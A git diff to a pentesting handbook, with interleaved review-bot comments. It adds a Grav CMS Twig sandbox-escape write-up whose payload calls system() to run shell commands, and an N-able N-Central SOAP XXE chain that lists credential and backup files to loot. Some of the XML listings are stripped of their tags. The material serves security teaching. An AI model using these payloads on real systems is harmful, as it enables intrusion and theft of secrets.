diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index fdf253b1bef..9ac5c0d0b19 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -375,6 +375,7 @@
- [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
- [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
- [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md)
+ - [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md)
- [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
- [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
- [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)
diff --git a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md
index 878d498c40e..8251e907770 100644
--- a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md
+++ b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md
@@ -81,3 +81,4 @@ adb shell ime help
- **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices.
- **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on “secret text entry” as a security boundary (a malicious IME sits below the app UI).
+{{#include ../../banners/hacktricks-training.md}}
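Review bot: the added `{{#include ../../banners/hacktricks-training.md}}` line sits directly under the last bullet with no separating blank line, whereas the methodology file later in this same patch puts a blank line between its list and the include; use the same spacing here so the banner does not render as part of the list.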
diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md
index 30f1c30a9da..a4a21ec10b0 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/README.md
@@ -549,6 +549,30 @@ $output = $twig > render (
- In Twig and Twig (Sandboxed) section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)
+#### Grav CMS evaluate_twig sandbox escape (CVE-2025-66294 + CVE-2025-66301)
+
+Grav CMS versions prior to 1.8.0-beta.27 sanitize Twig by running cleanDangerousTwig before evaluate_twig, but the regex fails to strip nested calls. By abusing CVE-2025-66301 an authenticated but low-privileged user can still reach /admin/pages/{page} and edit the form "process" section, storing Twig that will later execute with sandbox restrictions disabled.
+
+1. **Add a form that re-evaluates user input.** The page editor accepts JSON inside data[_json][header][form]. Submitting the snippet below wires the form field "name" into evaluate_twig, so whatever the victim submits later becomes a Twig expression:
+
+```http
+POST /admin/pages/contact/:add HTTP/1.1
+Host: grav.local
+Content-Type: application/x-www-form-urlencoded
+
+_task=save&data[_json][header][form]={"name":"abuse","fields":{"name":{"type":"text","label":"Name"}},"process":[{"message":"{{ evaluate_twig(form.value('name')) }}"}]}
+```
+
+2. **Abuse undefined-function callbacks to reach PHP.** When the attacker or another user submits the public form at /contact, the value stored in data[name] hits evaluate_twig. The payload below registers system() as the handler for undefined Twig functions, disables the sandbox flag, and calls the command string:
+
+```twig
+{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }}
+{% set _ = grav.config.set('system.twig.undefined_functions', false) %}
+{{ grav.twig.twig.getFunction('bash -c id') }}
+```
+
+3. **Deliver platform-specific shells.** The Metasploit module multi/http/grav_twig_ssti_sandbox_bypass_rce automatically swaps the payload for cmd/unix/* or cmd/windows/* stagers and can compress or base64-encode longer commands to fit inside the Twig expression.
+
### Plates (PHP)
Plates is a templating engine native to PHP, drawing inspiration from Twig. However, unlike Twig, which introduces a new syntax, Plates leverages native PHP code in templates, making it intuitive for PHP developers.
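Review bot: step 2's prose does not match the Twig it describes. The text says the payload "disables the sandbox flag", but the middle line is `{% set _ = grav.config.set('system.twig.undefined_functions', false) %}`, which only changes the `system.twig.undefined_functions` setting; either describe that line for what it does or explain why that setting is the one gating the sandbox. Step 1 has a similar gap: the text requires an authenticated (low-privileged) admin user, yet the shown request carries no session cookie or nonce, and its body is declared `application/x-www-form-urlencoded` while the JSON in `data[_json][header][form]` is pasted raw with unencoded braces and quotes, so it will not work as copied. Finally, `#### Grav CMS evaluate_twig sandbox escape ...` follows the PayloadsAllTheThings bullet with no blank line; add one so the heading is not swallowed by the list.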
@@ -1155,5 +1179,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt
- [https://portswigger.net/web-security/server-side-template-injection](https://portswigger.net/web-security/server-side-template-injection)
- [0xdf – HTB: Editor (XWiki SolrSearch Groovy RCE → Netdata ndsudo privesc)](https://0xdf.gitlab.io/2025/12/06/htb-editor.html)
- [XWiki advisory – `SolrSearch` RSS Groovy RCE (GHSA-rr6p-3pfg-562j / CVE-2025-24893)](https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j)
+- [Rapid7 – Metasploit Wrap-Up 12/19/2025](https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025/)
+- [Metasploit Module – multi/http/grav_twig_ssti_sandbox_bypass_rce.rb](https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/grav_twig_ssti_sandbox_bypass_rce.rb)
{{#include ../../banners/hacktricks-training.md}}
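Review bot: the new Metasploit module reference links the raw file on `master`, which silently changes or 404s once the module is edited or moved; link to a specific commit or to the module's page in the metasploit-framework repository so the reference stays stable.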
diff --git a/src/pentesting-web/web-vulnerabilities-methodology.md b/src/pentesting-web/web-vulnerabilities-methodology.md
index 9a0e6e5b500..056a3a48d7d 100644
--- a/src/pentesting-web/web-vulnerabilities-methodology.md
+++ b/src/pentesting-web/web-vulnerabilities-methodology.md
@@ -28,6 +28,9 @@ In every Web Pentest, there are **several hidden and obvious places that might b
> Most of the web applications will **allow users to input some data that will be processed later.**\
> Depending on the structure of the data the server is expecting some vulnerabilities may or may not apply.
+> [!NOTE]
+> Keep an eye on privileged workflows (installation wizards, XML/SOAP "hello" calls, or CMS page builders). If they create sessions before enforcing ACLs you can often chain them with attacks such as [XXE - XEE - XML External Entity](xxe-xee-xml-external-entity.md) or [SSTI (Server Side Template Injection)](ssti-server-side-template-injection/index.html) to reach file disclosure or RCE even when the dangerous endpoint was meant to be post-authentication.
+
### **Reflected Values**
If the introduced data may somehow be reflected in the response, the page might be vulnerable to several issues.
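Review bot: the `> [!NOTE]` admonition is added immediately after the existing `>` quote lines with no blank line between them, so markdown will merge it into the preceding blockquote and the `[!NOTE]` marker will render as literal text instead of a callout; insert a blank line before `> [!NOTE]`. Also, the SSTI link targets `ssti-server-side-template-injection/index.html` while the XXE link beside it targets a `.md` file as the rest of the book does; point it at the section's `README.md` for consistency with mdBook source links.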
@@ -211,4 +214,8 @@ Modern applications extend into browsers, wallets, and automation pipelines—ke
- [ ] [**Browser Extension Pentesting**](browser-extension-pentesting-methodology/)
- [ ] [**wfuzz Web Fuzzing**](web-tool-wfuzz.md)
+## References
+
+- [Rapid7 – Metasploit Wrap-Up 12/19/2025](https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025/)
+
{{#include ../banners/hacktricks-training.md}}
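Review bot: `## References` is inserted directly after the last checklist item with no blank line, so the heading follows a list item without separation; add a blank line before it, matching the blank line already placed after the reference entry.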
diff --git a/src/pentesting-web/xxe-xee-xml-external-entity.md b/src/pentesting-web/xxe-xee-xml-external-entity.md
index 730221dfbb7..ba5294b0228 100644
--- a/src/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/src/pentesting-web/xxe-xee-xml-external-entity.md
@@ -769,6 +769,48 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal
Take a look to this amazing report [https://swarm.ptsecurity.com/impossible-xxe-in-php/](https://swarm.ptsecurity.com/impossible-xxe-in-php/)
+### Chaining unauthenticated session bypass with SOAP XXE (N-able N-Central)
+
+N-able N-Central (2025.4.0.9) exposes SOAP endpoints that can be abused in tandem: CVE-2025-9316 lets you mint a session without credentials and CVE-2025-11700 lets that session import attacker-supplied XML. The result is an unauthenticated arbitrary file read that leaks the contents of N-Central's own configuration and backup artifacts.
+
+1. **Forge a session without credentials.** The sessionHello method on /dms/services/ServerUI accepts arbitrary appliance IDs and returns a <sessionID> even for unauthenticated clients. Brute-force the applianceId range (e.g., 1–30) until the server returns 200 plus a cookie:
+
+```xml
+
+
+
+ 7
+
+
+
+```
+
+2. **Stage a malicious log entry.** Reuse the hijacked session with applianceLogSubmit to write a base64-encoded service-template file under /opt/nable/webapps/ROOT/applianceLog/network_check_log_<ID>.log (the path is controllable via LOG_PATH). The payload is just XML that points to your DTD server:
+
+```xml
+
+ 1234567
+ NETWORK_CHECK_LOG
+ PD94bWwgdmVyc2lvbj0iMS4wIj8+PCFET0NUWVBF...
+
+```
+
+3. **Trigger the unsafe import.** Call importServiceTemplateFromFile on /dms/services/ServerUI and point filePath to the log you just wrote. When the server parses the file it will fetch your DTD over HTTP (self-signed HTTPS will fail with PKIX errors).
+
+4. **Error-based DTD exfiltration.** Serve a DTD that resolves a local file and injects the bytes into an error message by referencing a non-existent path. The contents show up inside the SOAP fault that bubbles back to the attacker:
+
+```xml
+
+">
+%boom; %error;
+```
+
+**Operational notes**
+
+- Interesting loot includes /opt/nable/var/ncsai/etc/ncbackup.conf, /var/opt/n-central/tmp/ncbackup/ncbackup.bin (PostgreSQL dumps), /opt/nable/etc/keystore.bcfks, /opt/nable/etc/masterPassword, and the usual /etc/passwd/shadow pairs.
+- Because the file read happens inside a SOAP fault you can script the extraction by parsing the <detail><string> element for the leaked bytes.
+- Set the DTD server to HTTP (DTD_PROTO=http) unless you can present a certificate the Java stack trusts.
+
## Tools
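Review bot: the three XML listings in this section have lost their element tags, leaving only text nodes (` 7`, ` 1234567`, ` NETWORK_CHECK_LOG`, the base64 prefix, and `">` / `%boom; %error;` in the DTD), so none of the SOAP envelopes for sessionHello, applianceLogSubmit or the error-based DTD can be reproduced from the page; restore the full markup before merging. The same stripping affects the prose: `<sessionID>` in step 1 and `<detail><string>` in the operational notes are raw angle-bracket tags that the renderer will drop, so wrap them in backticks.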
@@ -916,5 +958,7 @@ References for this vector are listed at the end of the page.
- [Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core XXE/SSRF + Path Traversal)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/)
- [Xerox FreeFlow Core Security Guide (architecture/ports)](https://securitydocs.business.xerox.com/wp-content/uploads/2025/03/Security-Guide-Information-Assurance-Disclosure-Xerox-FreeFlow-Core-8.0.pdf)
- [Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5](https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf)
+- [Rapid7 – Metasploit Wrap-Up 12/19/2025](https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025/)
+- [Metasploit Module – scanner/http/nable_ncentral_auth_bypass_xxe.rb](https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/http/nable_ncentral_auth_bypass_xxe.rb)
{{#include ../banners/hacktricks-training.md}}